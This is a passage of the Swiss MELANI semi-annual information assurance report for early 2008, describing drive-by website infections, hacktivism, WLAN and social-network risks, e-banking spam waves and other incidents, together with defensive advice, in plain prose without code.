Situation in Switzerland and Internationally

Document Sample
Situation in Switzerland and Internationally Powered By Docstoc
					                                           Federal Strategy Unit for IT FSUIT
                                           Federal Office of Police fedpol
                                           Reporting and Analysis Centre for Information Assurance MELANI
                                           www.melani.admin.ch




Information Assurance

Situation in Switzerland and Internationally
Semi-annual report 2008/I (January – June)




                                     In collaboration with:
Information Assurance – Situation in Switzerland and Internationally




Contents
1       Introduction .....................................................................................................................5
2       Current Situation, Threats and Risks............................................................................6
        2.1        From IT Security to Information Assurance............................................................6
        2.2        Mass Hacking of Legitimate Websites ...................................................................7
        2.3        Politically Motivated Hacking..................................................................................8
3       Trends / General Developments ....................................................................................9
        3.1        Open Wireless Networks as a Security Risk ..........................................................9
        3.2        Social Networks and the Threat of Data Abuse ...................................................10
        3.3        Commodity Malware and Commodity Hacking ....................................................10
4       Current National ICT Infrastructure Situation ............................................................12
        4.1        Breakdowns .........................................................................................................12
                   Confidential Schengen Data Published on FDJP Website...................................12
        4.2        Attacks .................................................................................................................12
                   Regular Spam E-Mails Target E-Banking Applications........................................12
                   Possible Attack Against forza-eveline.ch .............................................................14
        4.3        Crime....................................................................................................................14
                   Websites Misused for Drive-By Infections............................................................14
        4.4        Miscellaneous ......................................................................................................15
                   EURO 2008 Only a Limited Target for Cybercriminals ........................................15
                   Temporary Blocking of wikileaks.org....................................................................16
5       Current International ICT Situation .............................................................................17
        5.1        Breakdowns .........................................................................................................17
                   Damaged Undersea Internet Cables Interfere with Internet.................................17
                   Imprudent Approach to Sensitive Data ................................................................18
        5.2        Attacks .................................................................................................................18
                   Politically Motivated Hacking: Lithuania and Radio Free Europe Targeted .........18
                   ICANN and IANA Domains Hacked .....................................................................19
6       Prevention .....................................................................................................................19
        6.1        Focus: Wireless Networks....................................................................................19
7       Activities / Information .................................................................................................23
        7.1        State.....................................................................................................................23
                   Germany: Debate on Online Searches Continues ...............................................23
                   France: Arming for the Fight against Cyberattacks ..............................................24
                   Sweden: Controversial Surveillance Act Adopted by Parliament.........................24
                   NATO: Excellence Centre for Cyber Defence Established in Estonia .................24
                   EU: Extension of European Network and Information Security Agency, ENISA ..25
        7.2        Private Sector.......................................................................................................25
                   Improved Security Measures for E-Banking.........................................................25
                   WLAN in SBB First Class Carriages ....................................................................26
                   ICANN: Creation of New Top Level Domains ......................................................26


                                                                                                                                                  2/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

8       Legal Foundations ........................................................................................................27
              Federal Council Rejects New Legislation to Combat Network Crime ..................27
9       Glossary ........................................................................................................................28
10      Appendix .......................................................................................................................32
        10.1 Professionalization of Internet Crime: The Example of ZeuS ..............................32
        10.2 Drive-by Infections: What They Are and How They Work ....................................41




                                                                                                                                              3/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally



                                     Focus areas of issue 2008/I


  •     From IT Security to Information Assurance
        Current targeted IT attacks cannot always be successfully defended against even with
        the help of technical security measures and good common sense. Refocusing is
        therefore necessary, moving the protection of information to centre field and not only
        taking account of the protection of computers and networks.
        ► Current situation: Chapter 2.1
        ► Incidents in Switzerland: Chapter 4 and international incidents: Chapter 5.1

  •     Mass Hacking of Legitimate Websites
        The danger of drive-by infections via websites is growing rapidly. Since January 2008,
        several mass hacks of website have been observed with the intent of infecting users.
        These include websites with an excellent reputation and high visitor numbers.
        ► Current situation: Chapter 2.2
        ► Incidents in Switzerland: Chapter 4
        ► Appendix: Chapter 10.2

  •     Politically Motivated Hacking
        Cyberattacks can be an important way to gain attention for a political concern. In
        addition to financial motives, political motives are increasingly becoming a focus of
        Internet crime. Recent developments have contributed to a public discussion of
        politically motivated hacking, so-called "hacktivism".
        ► Current situation: Chapter 2.3
        ► International incidents: Chapter 5.2
        ► State activities: Chapter 7.1

  •     Open Wireless Networks as a Security Risk
        Wireless networks (WLANs) have become widespread also among private individuals.
        If these networks are insufficiently secure, criminals may use them to access data and
        to conceal their true identity when committing IT crimes. Such abuses are
        unfortunately becoming more and more frequent. Following certain basic rules can
        help keep one's network clean.
        ► Trends for the next half-year: Chapter 3.1
        ► Prevention: Chapter 6

  •     Social Networks and the Threat of Data Abuse
        Social networks are popular since they offer the possibility of presenting oneself on the
        Internet with relatively little effort. The publication of personal data on the Internet
        poses a danger, however: it helps cybercriminals launch targeted attacks.
        ► Trends for the next half-year: Chapter 3.2




                                                                                                    4/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally


1 Introduction
The seventh semi-annual report (January – June 2008) of the Reporting and Analysis Centre
for Information Assurance (MELANI) presents the most significant trends involving the
threats and risks arising from information and communication technologies (ICT). It provides
an overview of the events in Switzerland and abroad, illuminates the most important
developments in the field of prevention, and summarizes the activities of public and private
actors. Explanations of jargon and technical terms (in italics) can be found in a glossary at
the end of this report. Comments by MELANI are indicated by a shaded box.

Chapter 2 describes the current situation, threats, and risks of the last half-year. Chapter 3
provides an outlook on the expected developments.

Chapters 4 and 5 discuss breakdowns and failures, attacks, crime and terrorism connected
with ICT infrastructures. Selected examples are used to illustrate important events of the first
six months of 2008. The reader will find illustrative examples and details supplementing the
more general information contained in Chapters 2 and 3.

Chapter 6 discusses a topic in the field of prevention that is closely related to the threats
covered in Chapter 3.

Chapter 7 focuses on public and private sector activities relating to information assurance in
Switzerland and abroad.

Chapter 8 summarizes changes to the legal foundations.

Chapter 9 contains a glossary with the most important terms used in this report.

Chapter 10 is an appendix with expanded technical explanations and instructions on
selected topics covered in the semi-annual report.




                                                                                                   5/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally



2 Current Situation, Threats and Risks

2.1 From IT Security to Information Assurance
The Swiss Reporting and Analysis Centre for Information Assurance (MELANI) began its
work about 4 years ago. Like most others, MELANI from the outset advocated the classic
technical protective measures such as anti-virus software, regular updates of programmes
and operating systems, the use of firewalls and the need for backups. This ABCs of the most
important protective measures for computers – whether in a private household or a business
environment – are still valid and should be complied with under all circumstances. However,
they no longer are sufficient today.

When driving a car, seatbelts, the proper speed, and compliance with traffic rules are
considered prerequisites for safe driving, yet these security measures cannot always prevent
an accident. The same is true today in the world of bits and bytes. While the vast majority of
attacks on computers and networks could still be prevented today with technical security
measures and a bit of common sense, the world of information and communications
technology – like the world of driving – must finally say goodbye to the idea of "absolute
security". In the latest, very widely disseminated e-mail waves (see Chapter 4.2), the time
passing between sending of the messages and recognition of the malware by the first virus
scanners was between six and twelve hours – enough time to infect almost all potential
victims. In the case of targeted attacks via e-mail, in which several hundred recipients are
addressed, recognition should no longer be expected within hours without an emergency
patch from the anti-virus manufacturer – if the attack is recognized at all. Modern malware is
conceived so that it can hide as long as possible from anti-virus software.

In addition to the limits of technical security measures, the sometimes careless and even
naive handling of information and data inside the IT security perimeter is an additional
problem. Any firewall is useless if data within a company are openly on display or can be
found with ease. Technical protective measures can do even less if CD-ROMs containing
several million bank account datasets, tax statements and the like are simply lost in the
internal mail. Technical protective measures are also powerless against the careless
placement of personal information on the Internet, including social networks (see Chapter
3.2).

For these reasons, a further interplay of different factors will be observed in the near future:
First, the fact that classic IT security measures now only provide conditional protection will
force a rethinking in the overarching field of information assurance. Second, the sometimes
careless handling of personal, confidential, or business information will continue to constitute
a risk in the event of an attack: whether in the preparation of an attack, or whether facilitating
the attacker's search for and access to data once the technical protective barriers have been
successfully breached.

This development calls for a rethinking: The focus must now be on the protection of
information instead of exclusively protection of the computers and networks on which the
information is stored. This will require stronger information and data management,
information classification and the like. Moreover, a clear balancing of risks is required,
entailing that the security of distribution channels, access privileges, and storage locations
must be adjusted to the actual value of the information. Not every channel or storage location
is equally secure, and not all documents in a business are equally sensitive. In this way,
information assurance is integrated into the business and strategic risk management
processes.
                                                                                                     6/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

Such an approach can only be successful, however, if information assurance really becomes
an integral component of the security concept and is therefore situated at the same level as,
for instance, building and personal security, financial controlling, and so on.




2.2 Mass Hacking of Legitimate Websites
The danger of drive-by infections via websites is growing rapidly. Since January 2008,
several mass hacks of websites have been observed with the intent of infecting users. 1
These include websites with an excellent reputation and high visitor numbers. Even sites of
government organizations such as the United Nations (un.org) have been affected.

In the first half of 2008, MELANI also received an increasing number of reports of websites
that were hacked in order to place a drive-by infection (see Chapter 4.3). The scripts open
hidden IFrames with exploits to infect the computers of the users with pests – without user
interaction, but instead by exploiting vulnerabilities in the web browser. If these attempts do
not succeed, the visitor is then lured into installing a programme or plug-in. This likewise
infects the computer with malicious software, usually a Trojan downloader, which can
subsequently download additional malicious code.

In June 2008, a large number of Swiss websites were hacked and infected with malicious
JavaScript. The insidious aspect of this attack was that normal access to the site would not
trigger execution of the malicious code. If, however, the site was accessed via a search
engine such as Google or Yahoo, the malicious code was activated. The reason for this
concealment strategy is that website owners access their sites frequently, but as a rule
directly or via bookmarks. This contributes to keeping the infection undetected for as long as
possible.

The methods for injecting malicious code onto a website vary. Usually, the approach is to
exploit weaknesses in PHP applications, often by exploiting vulnerabilities in forums. Another
possibility is the use of SQL injections. In both cases, the websites are automatically tested
for common vulnerabilities. Website operators are thus advised to check their own
applications frequently for security risks and to modify them where necessary. 2 Additionally,
FTP access data to websites are being collected on a large scale. This may happen by way
of malicious software (keylogger) installed on the computer on which the website is
administered.

The advantage for criminals in distributing malicious code with the help of hacked websites is
obvious. When users receive unwanted e-mails nowadays, they are generally sceptical. But
if a large number of websites are hacked, the probability is high that some of the sites will
have a good reputation and a high number of visitors. Moreover, hackers try in a targeted
manner to attack websites with high visitor numbers. Limiting surfing to websites that are well
known or trustworthy therefore no longer offers protection. Many manufacturers of anti-virus




1
  See e.g. http://www.heise.de/newsticker/Massenhacks-von-Webseiten-werden-zur-Plage--/meldung/105053 (as
of: 11.08.2008) and http://www.heise.de/newsticker/Erneuter-Massenhack-von-Webseiten--/meldung/107786 (as
of: 11.08.2008) and http://www.heise.de/security/Wieder-gross-angelegte-Angriffe-auf-Web-Anwender-im-Gange-
Update--/news/meldung/101521 (as of: 11.08.2008).
2
  For additional information, see: http://www.heise.de/security/Grandsicherung-fuer-PHP-Software--/artikel/96564
(as of: 11.08.2008).

                                                                                                                   7/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

software try to counter the threat of drive-by infections by implementing additional protective
measures in their products. Restricting the use of JavaScript and ActiveX can also help
prevent unwanted drive-by downloads. 3




2.3 Politically Motivated Hacking
For general Internet crime, financial enrichment continues to represent the most important
motivation. In addition, however, other motives are becoming more important and are
increasingly discussed in public. One of these motives is political, so-called "hacktivism". The
term "hacktivism" combines hacking with political or social activism and will be referred to
here also as "politically motivated hacking". Hacktivism is not a new phenomenon, but has
become more prevalent recently.

Hacktivism may be based on nationalistic motives or may constitute a kind of public protest
or civil disobedience. The Internet constitutes a public stage and makes it possible to gain
worldwide attention by relatively simple means. Moreover, the Internet and information
technologies play an increasingly important role in modern states, providing numerous
targets. Actors in a political conflict or any type of dispute can use the Internet and
information technologies both as a means and as a target. For these purposes, politically
motivated hackers use a wide range of illegal or at least dubious means. Often used are
website defacements as well as DDoS attacks, attacks against a server with the goal of
interfering with one or more of its services. Other commonly used means are redirects,
information theft, website parodies, virtual sit-ins, sabotage, and specially developed
software. 4

Hacktivism has already existed since the late 1990s. The politically motivated DDoS attacks
against Estonia in 2007 in connection with the dispute over the relocation of a Soviet war
memorial in the Estonian capital Tallinn have now put this phenomenon on the political
agenda of many countries, however. 5 In this case, it is assumed that the perpetrators were
Russian nationalists. The broad discussion of this case also contributed to NATO's decision
in May of this year to establish a centre of cyberdefence (see Chapter 7.1).

In 2008, smouldering conflicts between Russia and other republics of the former Soviet
Union have led to politically motivated hacking attacks. For instance, Lithuania and Georgia 6
were victims of cyberattacks, the source of which is likely to be found in their conflicts with
Russia. Another probably politically motivated DDoS attack was against US-supported Radio
Free Europe. (See Chapter 5.2 for the attacks against Lithuania and Radio Free Europe.) A
somewhat different example of politically motivated hacking took place during the primary
elections in the US. The Barack Obama website was manipulated in such a way that visitors
were redirected to the Hillary Clinton website. Sporting events such as the EURO 2008 are
also repeatedly used as an occasion for politically motivated hacking attacks. For instance,



3
  See MELANI semi-annual report 2007/2, Chapter 6:
http://www.melani.admin.ch/dokumentation/00123/00124/01048/index.html?lang=en (as of: 15.08.08).
4
  For additional information, see: http://www.alexandrasamuel.com/dissertation/index.html (as of: 15.08.08).
5
  For the attack against Estonia, see MELANI semi-annual report 2007/1, Chapter 5.1:
http://www.melani.admin.ch/dokumentation/00123/00124/01029/index.html?lang=en (as of: 15.08.08).
6
  The conflict between Russia and Georgia was accompanied by violent cyberattacks since the end of July 2008,
especially against Georgian government offices. Since these attacks took place in the second half of 2008,
however, this report will not discuss them further.

                                                                                                                8/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

Turkish nationalists were likely responsible for the defacement of the website of the Croatian
foreign ministry during the game between the two countries (see Chapter 4.4).

Cyberattacks are a popular means for gaining attention for a political concern. First, these
means are relatively low-cost. Second, it is easily possible to erase tracks on the Internet,
thus making identification of the perpetrator more difficult. And third, the increasing
dependency of our modern society on IT resources entails that numerous attack vectors are
available and especially that such attacks can be carried out worldwide. It can therefore be
expected that political conflicts and disputes will increasingly be accompanied by hacking
attacks. It should be kept in mind, however, that while such operations may accompany
conflicts and wars, they are not suitable for directly supporting acts of war. Accordingly, the
frequent conflation of hacktivism and "cyberwar" is not accurate.




3 Trends / General Developments

3.1 Open Wireless Networks as a Security Risk
Wireless networks (WLANs) have become widespread also among private individuals.
Additionally, the trend is moving more and more clearly away from desktop computers
toward portable devices with built-in wireless network cards. The iPhone will also boost the
dynamics of wireless technology. Unfortunately, the misuse of wireless networks is also
steadily on the rise.

If a wireless connection is not sufficiently secure, it can be used to access both an existing
internal network as well as the Internet. The entire network traffic passing through this
wireless network can be recorded. If the internal network also lacks access restrictions for
folders, these can also be accessed without any difficulty. This is particularly problematic in
the case of business networks. A virtual break-in at a company can be very lucrative for an
attacker. The best-known example was the break-in into the TJX network in 2006. Insufficient
WLAN encryption in a business in Minnesota (United States) allowed 45.7 million client
accounts to be compromised. The hackers were able to crack the WEP-encrypted network
and gain access to the company's database. Especially problematic are wireless network
devices connected – without the knowledge of IT officers – to the company network, thereby
providing a point of attack for unknown hackers.

Poorly protected or open wireless networks also represent a further danger: When
committing a crime, criminals can conceal their IP address and their identity. People who fail
to protect their wireless network sufficiently can expect the network to be misused for
criminal acts. In Switzerland, several such cases have become known. These have included
extortions, sexual assault, and downloading of child pornography. Internet forums for these
purposes expressly recommend exploiting such vulnerabilities and using third-party wireless
networks. Although no criminal charges should be filed against the users of unsecured
wireless networks, they may nevertheless suffer unpleasant consequences. If an IP address
is discovered during criminal proceedings, this may lead to a house search. Everyone should
therefore think about security before making their Internet connection available to others:
What services should be provided? What sites should be allowed? Should access control be

                                                                                                  9/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

used? However, there is so far no legal basis to require wireless network owners to identify
their users. For a detailed assessment of the legal situation in Switzerland, see Chapter 6.

When employing wireless networks, a certain degree of sensitivity with respect to security is
appropriate. Persons not wanting to make their networks available to others should protect
them sufficiently. If one wishes to make one's wireless network available to others, however,
then restrictions should be considered in advance. These restrictions relate to defining the
persons to be given access to the wireless network as well as the services to be provided.
Chapter 6 offers some tips in this regard.




3.2 Social Networks and the Threat of Data Abuse
Social networks offer the possibility of creating one's own profile with relatively little effort and
presenting oneself on the Internet. Their popularity lies in being able to make and cultivate
numerous contacts in an easy and uncomplicated manner. They also make it possible to find
long-lost school colleagues and to search for new jobs. The enthusiastic use of these sites,
especially the way in which many users publish their personal information, bears dangers,
however.

Social networking sites can serve cybercriminals as a welcome supplier of information. To
launch a professional and targeted social engineering attack, criminals conduct detailed
Internet research in advance. Social networking sites containing numerous and diverse
information, such as job position, e-mail address, business partners, hobbies, and the like,
constitute a particularly profitable source. Using such information, e-mails infected with
malware can be written more credibly. Phishing e-mails can also be formulated in a more
targeted manner. Especially for businesses, such targeted attacks are problematic. Users
should also be cautious when receiving invitations for additional networks. Invitations from
unknown persons may conceal criminals and spammers who are merely interested in
collecting personal data.

Social networks are often thought of as a sort of parallel world. Many users divulge personal
information on the Internet that they would keep for themselves in the "real" world. This
perceived "community" may however be deceiving. Users are often unaware that personal
information such as photos and films published on the Internet often stay on the Internet.
Personal information on the Internet can also be analyzed for targeted advertising and
marketing.

The use of social networking sites should be governed by the same principles as use of the
Internet in general. As little personal information as possible should be divulged. The
information should be well protected and only made accessible to clearly defined persons.
Ultimately, the responsibility lies with each individual Internet user. Prior to publication,
everyone should think and decide for themselves which personal data to publish on the
Internet, thereby making it available to the public for an indeterminate time period.




3.3 Commodity Malware and Commodity Hacking
Since late 2007, more and more cases have surfaced in which commodities that have basic
operating systems or storage space are sold to consumers in a vulnerable or infected state.
These devices range from USB sticks or disks, USB-connected digital picture frames, to
                                                                                                        10/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

networked devices like routers and wireless routers. They are all sold as "common off-the-
shelf" (COTS) consumer products and are typically designed to be instantly used without
further software or hardware installations. Some are infected accidentally with viruses, others
manufactured with fraud in mind and misused by computer criminals as a new means to
spread malware. Such an approach is commonly termed "commodity hacking" 7 .

Two categories are distinguished: storage devices and network devices. What these two
categories have in common is an implicit trust by the consumer that these devices can be
“plugged and played” immediately without any need for security checks on their part. This
trust, however, can also make such devices an ideal medium for propagating malware.

Storage devices: Commodity storage devices are very broadly defined. On the one side they
include devices such as USB sticks and external hard drives, purchased specifically to hold
extra data. But also digital picture frames, telephones, and many other devices with flash
memory chips fall within this category. Many computers are configured in a way that
attaching such USB storage devices automatically opens folders or files. These actions
defined in autorun.inf may also be used to install malicious software.

Network devices: The second category is network devices. These can range from internal
network devices like scanners or printers to gateway devices, routers, and wireless routers.
While the internal devices are available within a network, and are harder to attack from the
Internet, commodity gateway devices connect a home network to the Internet. When used in
medium to large enterprises these devices are maintained by professional firewall and router
specialists. Home users, in contrast, typically have to install and maintain their devices on
their own. Once installed, these devices are often left to run permanently, without being
controlled. This accessibility makes them attractive to attackers. A successful attack may
allow full access to the bandwidth that these devices control. Consumers should be aware
that these devices will typically have working operating systems on them. The operating
systems are mass-produced and will have standard default settings such as administrator
passwords, which are known to hackers. The misuse of default passwords has been a
known problem for some time. 8

At the beginning of this year, Symantec identified the first cases of "drive-by pharming". With
this new type of malware attack, even just looking at a website with embedded malicious
code can cause manipulation of a home router so that entry of a specific URL will redirect the
user to a bogus site. 9 The attack method found does not even require the attacker to guess
an administrators’ password. 10

It must be expected that commodities will increasingly be attacked by criminals. There are
currently signs that commodities are evolving into a third attractive path for distributing
malware, in addition to infected spam e-mails and drive-by infections. Consumers will no
longer be able to rely completely on the manufacturer in this regard. With every purchase,
they should "prepare" their devices prior to use, for instance by having them checked by an
anti-virus scanner or by changing the default settings (passwords, etc.).




7
  See http://www.securityfocus.com/news/11499 (as of: 08.07.2008).
8
  See e.g.: http://www.indiana.edu/~phishing/papers/warkit.pdf and
http://www.symantec.com/avcenter/reference/Driveby_Pharming.pdf (as of: 23.01.2008).
9
  https://forums.symantec.com/syment/blog/article?message.uid=305989 (as of: 23.01.2008).
10
   https://forums.symantec.com/syment/blog/article?blog.id=emerging&message.id=94&jump=true#M94 (as of:
23.01.2008).
                                                                                                          11/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally


4 Current National ICT Infrastructure Situation

4.1 Breakdowns

Confidential Schengen Data Published on FDJP Website

For three weeks, the website of the Federal Department of Justice and Police (FDJP)
inadvertently made a document with confidential data on the Schengen agreement available
to the public. The paper contained answers of the Swiss federal authorities to more than 200
questions on implementation of Schengen requirements. These included detailed information
on Switzerland's measures against gangs of dealers in stolen goods, drug and people
smugglers, security measures at airports, and Swiss access points to the Schengen
Information System (SIS).

In the assessment of the Ambassador of the EU Commission to Switzerland and
Liechtenstein, Michael Reiterer, the document has a "low level of confidentiality". The effects
in this case therefore appear to be minor. Nevertheless, this example shows that it is not
sufficient to protect data against improper access from the outside. It is equally important to
define appropriate guidelines specifying which persons have access to protected documents
and which persons may modify or publish them. For instance, it is not sensible to grant all
persons access to all documents. Person-specific access is preferable, and it should be
considered which document is necessary for the work of which person.




4.2 Attacks

Regular Spam E-Mails Target E-Banking Applications

In the first half of 2008, numerous spam waves were observed containing malware and
targeting e-banking applications. On 7 January 2008 and on 14 March 2008, for instance, an
unknown number of e-mails with the subject line "News on radioactive contamination in
Switzerland" were sent out. After clicking on the link contained in the message, the recipient
was asked to install a file containing a video of the accident. Actually, however, the file
contained malware.




                                                                                                  12/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally




On 27 March 2008, an unknown number of e-mails were sent out with the subject line: "A
Swiss banking crisis is unavoidable". After clicking on the link contained in the e-mail
message, the recipient was asked to install a "plug-in". Here again, the goal was to install
malware. This spam wave is notable in particular since its content referred to a current and
much-discussed topic at that time, namely the events relating to the mortgage crisis.

Later e-mails varied with respect to content and subject line. The more recent e-mails
contained attachments with executable files. These were usually compressed (zip, rar) to
conceal their extensions. For a full list of the spam waves, please refer to the MELANI
newsletter. 11

In the first half of 2008, MELANI observed several e-mail waves targeting e-banking
applications. Over some periods, these waves could be observed with weekly frequency. The
same type of malware was always used. However, the malware was modified so that it could
initially be identified by only few anti-virus programmes or not at all. The content of the e-
mails was intended to stimulate the curiosity or fear of the recipient. The linguistic quality of
the texts varied, but most were written in poor German. One striking sign was the lack of
umlauts. The content of the e-mails also contained errors. For instance, there are no Swiss
nuclear power plants in Geneva.
In general, it must be assumed that the topicality of a message, its thematic adjustment to
the recipients, and its linguistic quality are factors that may convince a recipient to click on a
link or to open an attachment. An increase of targeted spam waves should be expected in
the future.
In its newsletter, MELANI warns of these spam waves regularly and in detail. In general, it is
recommended to be cautious when receiving e-mails from unknown senders. In such cases,
do not open any attached documents or programs, and do not click on any links contained in
the message. If an attachment is opened or a link is clicked on, MELANI recommends
consulting a computer specialist to reinstall the machine. Additionally, MELANI recommends
changing all passwords (e-mail account, auction sites, login data, etc.).



11
     http://www.melani.admin.ch/dienstleistungen/newsletter/00128/index.html?lang=en (as of: 11.08.2008).

                                                                                                            13/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

In the first half of 2008, drive-by infections (see Chapters 2.2 and 4.3) were also used to
distribute Trojan horses targeting Swiss e-banking clients. However, these used a different
malicious software variant than that distributed by e-mail.
In general, the following rule applies: When unexplainable interruptions in the e-banking
session occur, the affected clients should immediately contact the e-banking hotline of their
bank.




Possible Attack Against forza-eveline.ch

On 9 April 2008, it became public that the site www.forza-eveline.net could no longer be
accessed. The website collected signatures sympathetic to Federal Councillor Eveline
Widmer-Schlumpf. A DDoS attack against the website was suspected. An analysis by
MELANI showed, however, that the time distribution of queries did not exhibit any unusual
peaks, but rather only the typical temporal surfing behaviour of Swiss users. There was also
no unusually high number of queries from abroad. The statistically well-distributed IP address
range consisting almost exclusively of Swiss addresses indicates that this was most probably
not a DDoS attack. While the data volume was large, it should have been manageable by
any medium-size provider. However, it should be noted that DDoS attacks may also occur
against lower layers (e.g. SYN flooding), which at most appear in the log of a firewall or
router. The analysis of the POST entries is also interesting. These represent the entries
made in the guest book and are forwarded to a mySQL database. At a certain time,
suspicious entries appeared that otherwise did not exist in the log file. Shortly afterwards, the
database crashed.

MELANI believes that a DDoS attack is unlikely in this case; at most 5 hits per second were
recorded. It is more probable that ultimately, the system was unable to handle the many
legitimate queries. However, MELANI did find indications of possible compromising of the
underlying mySQL database in which the guest book entries were stored.




4.3 Crime

Websites Misused for Drive-By Infections

The distribution of drive-by infections has surged in recent months. Sites are systematically
hacked, on which malicious code is then placed. To achieve this, vulnerabilities especially on
interactive websites are exploited, or the access data of website administrators is spied out.

At the end of June 2008, massive numbers of websites at a single Swiss hosting provider
were compromised, on which a link to malicious JavaScript was placed. The insidious aspect
of this attack was that normal access to the site would not trigger execution of the malicious
code, but only when the site was accessed via a search engine (see Chapter 2.2). As a
further concealment measure, the malicious JavaScript had the same name as a JavaScript
used by Google for website analysis (Google-Analytics). Even the domain on which the script
was saved looked convincingly like a Google domain and differed only at the top level. An
estimated 1,000 websites were hacked in this case. It is not known how many people were
infected.

Other Swiss websites were also victims of drive-by infections. The websites of the former
Member of the Council of States from Valais, Simon Epiney (simonepiney.ch), and of the
                                                                                                    14/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

Green Party of Switzerland (gruene.ch) were compromised and infected with a drive-by
infection. Once the infection became known, the sites were temporarily blocked by the
providers. How many computer users were actually infected is again unclear. According to
information supplied by the provider, a vulnerability in a PHP application was the reason in at
least one case why the sites could be manipulated.

Website operators are advised to regularly check their applications for security risks and to
modify them where necessary. 12 MELANI also recommends that web and server
administrators install updates and patches as quickly as possible, both for the software used
on their website and for the webserver itself.
Additionally, FTP access data to websites are being collected on a large scale. This may
happen by way of malicious software (keylogger) installed on the computer on which the
website is administered.




4.4 Miscellaneous

EURO 2008 Only a Limited Target for Cybercriminals

It was expected that the EURO 2008 would be used by cybercriminals as a launch pad for
their criminal machinations. These activities were strictly limited, however. Some of the
incidents were the following:

euroticketshop.com
At the end of March 2008, hackers succeeded in manipulating the order page of the popular
ticket site "euroticketshop.com" so that visitors were infected via drive-by infection by the
Trojan "TR/Dldr.Small.hzj". As needed, the attacker could use the Trojan to download further
malicious software with a wide range of functions. It is unknown how many computers were
infected on this site.

sleep-in.ch
The Swiss website "sleep-in.ch", on which private hosts offered accommodation for the
EURO 2008, reported that it was attacked by hackers on 21 April 2008. Offers by more than
2,800 hosts were targeted and deleted. The lost data could largely be restored through
backups.

Bogus UEFA lottery
During the EURO 2008, numerous e-mails were sent with the notice that the recipient had
won a million euros in the UEFA lottery. This UEFA lottery was, of course, bogus. The e-mail
was a typical attempt to swindle recipients out of money through false promises. When the
recipient responds to such an e-mail, some excuse is given to demand an advance payment
(winnings tax). Of course, the promised money is then never transferred.

Defacement of the website of the Croatian foreign ministry
Turkish hackers are suspected of manipulating the website of the Croatian foreign ministry




12
  For additional information, see: http://www.heise.de/security/Grandsicherung-fuer-PHP-Software--/artikel/96564
(as of: 11.08.2008).

                                                                                                                   15/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

during the Croatia – Turkey match. Instead of the original text, a Turkish flag was displayed.
Once the manipulation was noticed, the server was shut down.

Power outage at the International Broadcast Centre of UEFA
A power outage at the International Broadcast Centre of UEFA in Vienna resulted in an
interruption of the TV broadcast of the semi-final match between Germany and Turkey for
about eight minutes. The power outage was triggered by a major thunderstorm over Vienna.
A software error prevented a seamless switch to emergency power generators, causing
several computers to crash. The interruption affected all countries' TV stations except Swiss
Television and Al Jazeera.

From the perspective of information assurance, the EURO 2008 was very quiet.
Cybercriminals had been expected to use the EURO as a launch pad for their criminal
machinations. Some attacks of this sort were reported, but the volume of reporting to
MELANI was comparable with other months overall. It should be emphasized in particular
that no DDoS attacks against the websites of critical information infrastructures or EURO
2008 websites were registered.




Temporary Blocking of wikileaks.org

Wikileaks is an anonymous project launched the end of 2006 for "untraceable mass
document leaking and analysis". It primarily targets persons such as regime critics who
cannot publish their knowledge in the censored press of their home countries. Wikileaks also
wants to support those who "wish to reveal unethical behaviour in their governments and
corporations". Wikileaks does not guarantee the authenticity of the documents and leaves it
to readers to do their own further research.

On 15 February 2008, the wikileaks.org domain was blocked pursuant to a temporary
injunction issued to the registrar by a Californian judge. This injunction was triggered by the
publication of specific documents: A former employee of the Julius Bär bank branch on the
Cayman Islands had accused the bank of facilitating its clients' money laundering and tax
evasion. Documents supporting this claim were published on the wikileaks.org website. The
documents contained correspondence, internal memos, and calculations of the bank.
According to Julius Bär, the information consisted of a mix of documents, some of which had
been falsified and some of which were generic shams. Julius Bär filed suit against the
publication and achieved an "interim" blocking of the domains by the US judge. This caused
serious protest among American civil rights organizations and the media. They claimed that
the blocking of the domain violated freedom of speech. Two weeks later, the judge changed
his opinion "due to constitutional concerns and other legal considerations". The injunction
was lifted, and the website has again been reachable under its usual URL since 29 February
2008. The bank subsequently retracted its lawsuit against wikileaks.org.

When companies or government authorities try to act against the publication of specific
documents on the Internet, their efforts are typically unsuccessful. In this case, the
correspondence between the bank and its lawyers appeared soon afterwards on Wikileaks,
which noted that the call for censorship indicated that the published materials were authentic.
Wikileaks garnered considerable international publicity due to the media coverage of the
blocking of its domain. This further enhanced the credibility of the demonstrably false
documents.
According to its own information, Wikileaks is operated by a worldwide network of volunteers.
It claims that this global network ensures flexibility during emergencies. Due to the available
alternative domains (wikileaks.be, wikileaks.cx, etc.), the contents are easily accessible even

                                                                                                  16/48


MELANI – Semi-annual report 2008/I
Information Assurance – Situation in Switzerland and Internationally

after the main domain has been blocked. Even if all known alternative domains were to be
blocked, the contents – which are mirrored on many different servers in various countries –
would continue to be accessible. Even if the current online server of the website were to be
interfered with physically, it would only be a short time before another server would assume
its tasks. In short, once a document has been published on Wikileaks, it can hardly ever be
removed.




5 Current International ICT Situation

5.1 Breakdowns

Damaged Undersea Internet Cables Interfere with Internet

At the beginning of 2008, several undersea Internet cables in the Mediterranean and the
Persian Gulf were damaged in the course of just a few days. This resulted in at times
substantial interference with the Internet between Europe, the Middle East, and the Indian
subcontinent. Such incidents call for answers concerning the vulnerability and redundancy of
the Internet.

First, two undersea cables in the Mediterranean broke, connecting Europe via Egypt and the
Middle East to India. Thus, a location was affected that represented the only route for the
Internet traffic of entire regions of the worlds. This damage was responsible for a shortage of
about 70% of the network capacity in Egypt and interference with about 50% of the data
traffic from India to the West. A few days later, two additional undersea cables in the Persian
Gulf failed. The effects were mitigated by the availability of alternative routes in the Arab
world.

